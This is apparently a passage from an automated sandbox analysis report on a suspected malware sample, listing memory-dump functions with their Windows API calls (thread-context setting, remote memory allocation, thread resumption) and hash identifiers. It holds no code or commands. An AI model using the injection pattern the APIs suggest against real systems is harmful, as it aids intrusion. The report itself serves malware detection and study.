                                                                                          • Instruction ID: 8159d41812e29d8a84f0813711f12d1dc5e580a6318e894e3c62bf7e7ece700a
                                                                                          • Opcode Fuzzy Hash: f34ea4a93faf0069510bb1f4a454afe0b87b17230466c2f80d2574c30e8fcd11
                                                                                          • Instruction Fuzzy Hash: 842139B1D003499FDB10DFAAC981ADEFBF5FF48324F10842AE519A7250C779A900DBA5
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0754B94E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 05d9e0810528672ee4f2ae0b99fd1501c6b075893a3ac8eb752d1a3b6f1173c5
                                                                                          • Instruction ID: 04a7372f9f75ebfaf0469eed6c85174b0ae95c762b6bdafb7f62ef9d6f32d999
                                                                                          • Opcode Fuzzy Hash: 05d9e0810528672ee4f2ae0b99fd1501c6b075893a3ac8eb752d1a3b6f1173c5
                                                                                          • Instruction Fuzzy Hash: 092138B1D003099FDB10DFAAC8857EEBBF4EF48324F14842AD559A7240C7789944CFA1
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C1D6E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: ad571b740bc64f9bcc50b638281c53d6e3f7869e491f3eb78e2f0d526adc235a
                                                                                          • Instruction ID: d12dfefcf141329130d6b61951775f269fed37709bbfc37e25d48007a82780e5
                                                                                          • Opcode Fuzzy Hash: ad571b740bc64f9bcc50b638281c53d6e3f7869e491f3eb78e2f0d526adc235a
                                                                                          • Instruction Fuzzy Hash: B821E4B59002099FDB10CF9AD984ADEBBF8EF48320F14841AE918A3310D374A940DFA5
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0754BA16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 7899519575df75e9011a20cc7e707067423773abd4474cacf3bf4d82e97bcdfa
                                                                                          • Instruction ID: f407d5554253346aa1db3d121fef5ad76776ca246a3660601a1f04b5f993006c
                                                                                          • Opcode Fuzzy Hash: 7899519575df75e9011a20cc7e707067423773abd4474cacf3bf4d82e97bcdfa
                                                                                          • Instruction Fuzzy Hash: 6A1189B68003499FDB10DFAAC845ADEBFF5EF48324F20881AE519A7250CB75A540CBA1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 69f72476d4f46ed4aaf208a283282865a6e5264b878006bd262536a614394366
                                                                                          • Instruction ID: 40586b5b7b606e5ad2dd9564f09b4facdabe890960025a8c36039827576bf9de
                                                                                          • Opcode Fuzzy Hash: 69f72476d4f46ed4aaf208a283282865a6e5264b878006bd262536a614394366
                                                                                          • Instruction Fuzzy Hash: 041158B1D002098FDB20DFAAD5457DEFBF5EF88328F24881AD519A7340CA79A540CBA5
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0754BA16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 87cf3597a3af140ef6007b4e1b2d11b07aa99c4619ac4ac543abc08d7546e284
                                                                                          • Instruction ID: ec1c3190814bff43965274df04f30cf2da9f5c344e99785e70f12075e1dad899
                                                                                          • Opcode Fuzzy Hash: 87cf3597a3af140ef6007b4e1b2d11b07aa99c4619ac4ac543abc08d7546e284
                                                                                          • Instruction Fuzzy Hash: 70113AB29002499FDB10DFAAC845ADFBFF5EF48324F248419E519A7250C7759540DFA1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 572eb0900f9040e110e4c7cc0e1418046913949e3e09c49c2d3f038db9b91225
                                                                                          • Instruction ID: 1caff6d033bff4e27e55ca3449cf217aba5465ace8aaeb9cf5ee3d206732f91e
                                                                                          • Opcode Fuzzy Hash: 572eb0900f9040e110e4c7cc0e1418046913949e3e09c49c2d3f038db9b91225
                                                                                          • Instruction Fuzzy Hash: C71128B1D002498FDB20DFAAC4457DEFBF5EF88324F24841AD519A7240C679A540CB95
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 00C1AFDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: aa23b9f8fc0378848d0895e9b136fdf3f6c9a9c8ef3e5628bad14f37aa3baeac
                                                                                          • Instruction ID: da257607c2b1f66ccec5243ab09bf56099c0d0b13827e18cfe78ab296afdc8cd
                                                                                          • Opcode Fuzzy Hash: aa23b9f8fc0378848d0895e9b136fdf3f6c9a9c8ef3e5628bad14f37aa3baeac
                                                                                          • Instruction Fuzzy Hash: 1611E0B6C002498FDB10CF9AC544ADEFBF4EF89324F24845AD429A7610D379A645CFA1
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 0AD60135
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1838316165.000000000AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ad60000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          • Opcode ID: 4f254e89535dd1d9ce6fe165bae4cdbaeb51a535681ac5aee4c6bf233e4f69b1
                                                                                          • Instruction ID: dd67af759b9f616358f3236f294d2eaab48254f720bffab0570f873177b5788e
                                                                                          • Opcode Fuzzy Hash: 4f254e89535dd1d9ce6fe165bae4cdbaeb51a535681ac5aee4c6bf233e4f69b1
                                                                                          • Instruction Fuzzy Hash: 131103B5800349DFDB10DF99D985BDEBBF8EB48324F20841AE518A7200D379A944CFA5
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 0AD60135
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1838316165.000000000AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ad60000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          • Opcode ID: 590884bf2f075b05cd638944c3c9c0e05a70a7c721364957d31d20e8cb4e1248
                                                                                          • Instruction ID: d97809a0ecbb9fa619febc74ead66dcbd7b8f00dddba28e8523a787e56593948
                                                                                          • Opcode Fuzzy Hash: 590884bf2f075b05cd638944c3c9c0e05a70a7c721364957d31d20e8cb4e1248
                                                                                          • Instruction Fuzzy Hash: D511D3B5800349DFDB10DF9AC985BDEBBF8EB48324F20841AE518A7610C379A544CFA5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: d8kq
                                                                                          • API String ID: 0-510916774
                                                                                          • Opcode ID: 13e9a5c7e985ebf9a0c2d498245225807ae1c520b41ea9ae4d95384ad6fe5781
                                                                                          • Instruction ID: 73613b7b1ae306e4852966529b308b22d66655581bcb37b79a6181e95840a2dc
                                                                                          • Opcode Fuzzy Hash: 13e9a5c7e985ebf9a0c2d498245225807ae1c520b41ea9ae4d95384ad6fe5781
                                                                                          • Instruction Fuzzy Hash: CA616034B00118AFCB16DF69D894AAE7BF6EF89711F144469E906A7394CB31DC41CB94
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Tefq
                                                                                          • API String ID: 0-1066582953
                                                                                          • Opcode ID: ee5c749d6af54dd129b0a15702a12a014b2a85c840f85c8520a897e89e7966ee
                                                                                          • Instruction ID: b88684d830b6f0c4231660e56b8221a7bff40cce5afd7bd97c234a722eeec968
                                                                                          • Opcode Fuzzy Hash: ee5c749d6af54dd129b0a15702a12a014b2a85c840f85c8520a897e89e7966ee
                                                                                          • Instruction Fuzzy Hash: F051AE71B002494FCB05EB79D8949AEBBF6EFC5320714896AE459D7391EF309D0687A0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8jq
                                                                                          • API String ID: 0-3286795621
                                                                                          • Opcode ID: 48fcc2e4556cf1a5f5cfc49f5c42dea4dd4c9ed8f92568a33bdc41270f01313a
                                                                                          • Instruction ID: 0cb6c67a1d3f67403ab25ea54274422a6b3cedf0f771cc022b88c6f772a2d3e1
                                                                                          • Opcode Fuzzy Hash: 48fcc2e4556cf1a5f5cfc49f5c42dea4dd4c9ed8f92568a33bdc41270f01313a
                                                                                          • Instruction Fuzzy Hash: 9241E678E15208DFCB05DFA9E8446EEBBB6FF89311F108029E815A7794CB705D45CBA0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8jq
                                                                                          • API String ID: 0-3286795621
                                                                                          • Opcode ID: b8dd839ac2e0200e4008f7a158e6bfebd90b9b9007abe7d32a36536a7ff6276c
                                                                                          • Instruction ID: 97f8a3401a88e6c9bda54adf98bf7f2968592800a1cb3f903c8439fb136fb5ec
                                                                                          • Opcode Fuzzy Hash: b8dd839ac2e0200e4008f7a158e6bfebd90b9b9007abe7d32a36536a7ff6276c
                                                                                          • Instruction Fuzzy Hash: 41410379E15208DFCB05DFA8E8446AEBBB6FB89310F10802AE815A7794CB705D41CFA0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LRfq
                                                                                          • API String ID: 0-2333822924
                                                                                          • Opcode ID: d131baf91077f9ab0a894e5b00e49572789e7222e8147f49ea06a6992fce6e6c
                                                                                          • Instruction ID: 38dec25a55f5bd01da51a27fe66c2fb71eac90ed225f4d1e5eab40cbbf3eaba0
                                                                                          • Opcode Fuzzy Hash: d131baf91077f9ab0a894e5b00e49572789e7222e8147f49ea06a6992fce6e6c
                                                                                          • Instruction Fuzzy Hash: 4A311A74E192188BDB48CFAAD8456EEBBF6FF89300F54C02AD449A7395DB745902CF60
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LRfq
                                                                                          • API String ID: 0-2333822924
                                                                                          • Opcode ID: 35abae594e450fa4ca4c634200bd36f7b1de1c4f4bb3f4a46fe0cd17e4c080ee
                                                                                          • Instruction ID: 1094fbe02f48a918ae3b967b22e9a3c358b09c722412e2b3e18decdd1833b0d9
                                                                                          • Opcode Fuzzy Hash: 35abae594e450fa4ca4c634200bd36f7b1de1c4f4bb3f4a46fe0cd17e4c080ee
                                                                                          • Instruction Fuzzy Hash: 8B31F774E192188BDB48DFAAC8456EEBBF6FF89300F54802AD409A7395DB745902CF60
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Tefq
                                                                                          • API String ID: 0-1066582953
                                                                                          • Opcode ID: 947ab2eeb14a147672f01a3d8bd852020cf17b3dffb3464dd58576f9b6d889c3
                                                                                          • Instruction ID: c61335411061c85399ccdc584b13062447e34882474b6928184e6e7ec29be829
                                                                                          • Opcode Fuzzy Hash: 947ab2eeb14a147672f01a3d8bd852020cf17b3dffb3464dd58576f9b6d889c3
                                                                                          • Instruction Fuzzy Hash: 2F111871F0025A8BCB55EBB9E9116EFB7B6AB89311F104469C504E7354EF318E11CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LRfq
                                                                                          • API String ID: 0-2333822924
                                                                                          • Opcode ID: ab0f0110dd3f92acb8cf3900f967fc09a053e1b6952c6d6f66eb1799f3155adf
                                                                                          • Instruction ID: 72f1f0a8cb20d35b1f86393dc152354387053bbf6422e579fc31f87f4bbe0eb8
                                                                                          • Opcode Fuzzy Hash: ab0f0110dd3f92acb8cf3900f967fc09a053e1b6952c6d6f66eb1799f3155adf
                                                                                          • Instruction Fuzzy Hash: AA11C374E192188BCB45DFA8D8816ADBBF5FF89300F60502AE44AA7385CB349D01CF20
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq
                                                                                          • API String ID: 0-2007657732
                                                                                          • Opcode ID: 558a75fe25be6e060d896264e8af0eb1b87527606f882670db58a48efd8c75b2
                                                                                          • Instruction ID: 8ed4de39b07fed0b722d6f0968d1b1f44b0b2a578dd48b8b328922a63b864961
                                                                                          • Opcode Fuzzy Hash: 558a75fe25be6e060d896264e8af0eb1b87527606f882670db58a48efd8c75b2
                                                                                          • Instruction Fuzzy Hash: 94F06974A00209EFCB49EFB8E59469DBBF1FB54201B1008A9E405A7399DE301A549B41
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq
                                                                                          • API String ID: 0-2007657732
                                                                                          • Opcode ID: 351898300512f67bd2714af158260f7ca9f692b06b3dea42b273aac8e7abf58b
                                                                                          • Instruction ID: 93c414416e2cd673a2e7c6127753dcd255e32209af1a421a3f86646110f7456d
                                                                                          • Opcode Fuzzy Hash: 351898300512f67bd2714af158260f7ca9f692b06b3dea42b273aac8e7abf58b
                                                                                          • Instruction Fuzzy Hash: 39F01974A01209EFCB49EFB8E59469DBBF1FB54201B1009A9E405A7399DE301A549B41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 56f90970d1fd9133376291222a822d853bfc662cecf2622af22eed955469ceb7
                                                                                          • Instruction ID: 4011f8951774f961321f256b1c1b4b75f50e26ea45fe9686ab0c4398291d2800
                                                                                          • Opcode Fuzzy Hash: 56f90970d1fd9133376291222a822d853bfc662cecf2622af22eed955469ceb7
                                                                                          • Instruction Fuzzy Hash: 40623EF0D01B419AD7329F74E4983EE7AA1AB49340F905D6ED0BACB391DB359881CF25
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e76ffffcbc12f16f0e4809c2114410a2ed1f816b32a6a557df4f92575098fd6b
                                                                                          • Instruction ID: 2c5a614b5c0573dc0866f0122b43b27f784aa6e5961b1695098c8fb08c9e3079
                                                                                          • Opcode Fuzzy Hash: e76ffffcbc12f16f0e4809c2114410a2ed1f816b32a6a557df4f92575098fd6b
                                                                                          • Instruction Fuzzy Hash: 5B126AF0D05B429AD7755F74F4883DEB690AB0A380FA05D1BC0FACA355C7369886CB5A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f80a279100322ef44023c32f06ba0b061021e221da959596b03edb954b14f31d
                                                                                          • Instruction ID: 91aa8d45e227275b153f4834ade4b95e5b53284ebe41323882c43cc3ac95802f
                                                                                          • Opcode Fuzzy Hash: f80a279100322ef44023c32f06ba0b061021e221da959596b03edb954b14f31d
                                                                                          • Instruction Fuzzy Hash: 35B17C71A002199FDB06DF68D894AAEBBF2FF88350F148429E91697394DB30ED51CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aee93a7d417086f0375d21f2712db2442ab20c615ca34ea5f07c888ffdfeb7d1
                                                                                          • Instruction ID: c35cb8dcbff27042f6f3e474fb78af2d3f388e57f44481fe06384d41d0f528ec
                                                                                          • Opcode Fuzzy Hash: aee93a7d417086f0375d21f2712db2442ab20c615ca34ea5f07c888ffdfeb7d1
                                                                                          • Instruction Fuzzy Hash: 65718E74A01208AFDB15DF69D888DAEBBB2BF49714F1144A9F905AB361DB31EC81CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 478a8f1dba1a7ca11afecfa35d416216cd2897bdc3b8b41c07cda664ca942ff5
                                                                                          • Instruction ID: 1011f000a56c60eb4e4e019bec1d4b77485f0fb7b1b876f8714d41e201373d79
                                                                                          • Opcode Fuzzy Hash: 478a8f1dba1a7ca11afecfa35d416216cd2897bdc3b8b41c07cda664ca942ff5
                                                                                          • Instruction Fuzzy Hash: B361D775E19208DFCB05EFA8E484AAEBBB6FF8A311F109129E415A7384DB705D45CF60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d256fd55216bcac01d80bd140044cfede0fe9113725470d27f3181e20348b928
                                                                                          • Instruction ID: e70c13a23b5973aa6380fc2f856b7944182fda288b2edcbebd9c1871c628cba6
                                                                                          • Opcode Fuzzy Hash: d256fd55216bcac01d80bd140044cfede0fe9113725470d27f3181e20348b928
                                                                                          • Instruction Fuzzy Hash: 1E61C575E19208CFCB45EFA8E484AAEBBB6FF89311F109129E415A7384DB709D45CF60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2d887e7fd22479311914f76cb8c4be5b36409369662b4fa951c557d3a839428f
                                                                                          • Instruction ID: 1475812c249819a77c31b5cfe019bbd934100c3c766a0198816206797e199103
                                                                                          • Opcode Fuzzy Hash: 2d887e7fd22479311914f76cb8c4be5b36409369662b4fa951c557d3a839428f
                                                                                          • Instruction Fuzzy Hash: 5061A278E19219CFCB45EFA8E484AAEBBB6FF49311F105119E405A7384CB709D45CF60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7c8753ef4fbfdf0e37f179e984c237d7484515b6ba43892742b66c90939461e7
                                                                                          • Instruction ID: 2c2890f5d4c55709b02d0ae3b1bf05ad4a50e693fd89e06157929379039fddd0
                                                                                          • Opcode Fuzzy Hash: 7c8753ef4fbfdf0e37f179e984c237d7484515b6ba43892742b66c90939461e7
                                                                                          • Instruction Fuzzy Hash: 48418F31B002059FCB15DB69D894BAEBBF5EF89310F1440BAE509EB3A1DA319D45DBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5df4631559bf86ab7811be0846e5c646416b3a859c0087c78a47181727791efd
                                                                                          • Instruction ID: 6f62a0463bf5a6cec79ef94f8ce5827a1f4e0b09c28572ec8ef5c9ec568692bb
                                                                                          • Opcode Fuzzy Hash: 5df4631559bf86ab7811be0846e5c646416b3a859c0087c78a47181727791efd
                                                                                          • Instruction Fuzzy Hash: 9D415735A16208CBCB01EFA8D1849EEBBF1FB49300F20946AE885B7368CB359D15CB55
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ecce0b1379119cefe29abbda307b1e9417865c45c46de865edcf309ae5fc581c
                                                                                          • Instruction ID: 39098c72b5e1113f5390d17eed5cb809d4b82329c47c1ecec7104f7cb36e1281
                                                                                          • Opcode Fuzzy Hash: ecce0b1379119cefe29abbda307b1e9417865c45c46de865edcf309ae5fc581c
                                                                                          • Instruction Fuzzy Hash: F6416D71B001199FDF069F64D884AAEBBB6FF84350F148828F90597394DB30DD62CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d84356d9a099d9f87b6da38dc81a4e877b1915f7944b3ea31faf281c850c41c9
                                                                                          • Instruction ID: 5dbc386e217139485b456a0bb8c5825636ac2ee5900cdf16ff6a99b790fc7ca6
                                                                                          • Opcode Fuzzy Hash: d84356d9a099d9f87b6da38dc81a4e877b1915f7944b3ea31faf281c850c41c9
                                                                                          • Instruction Fuzzy Hash: 79312272905258AFCF06DF68D8946ED7FB5EF4A310F0800AAE481AB362D730DC55DBA5
Memory Dump Source
• Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0c8c96ebf4e90bedf17df0665098556eae0a5ceed7b6a074f48bb3e19c1dc34e
• Instruction ID: d94f10c0330973f3840ffcddb5d40f2a26ff0ce7bbd1ca218a5ad202760013f7
• Opcode Fuzzy Hash: 0c8c96ebf4e90bedf17df0665098556eae0a5ceed7b6a074f48bb3e19c1dc34e
• Instruction Fuzzy Hash: CE210271A10109AFDB15ABB4D9946AEB7F3FFCA701F584419E502AB364EF708D45CB80
Memory Dump Source
• Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ab78a28b968092718a0f1c284b510fd81de9c5a7aefe72a952b867bee9803f8
• Instruction ID: 12515767d187a012cc3e073725d6e095f38c2b935df1d0cc29c2cd6edf6ffe7f
• Opcode Fuzzy Hash: 5ab78a28b968092718a0f1c284b510fd81de9c5a7aefe72a952b867bee9803f8
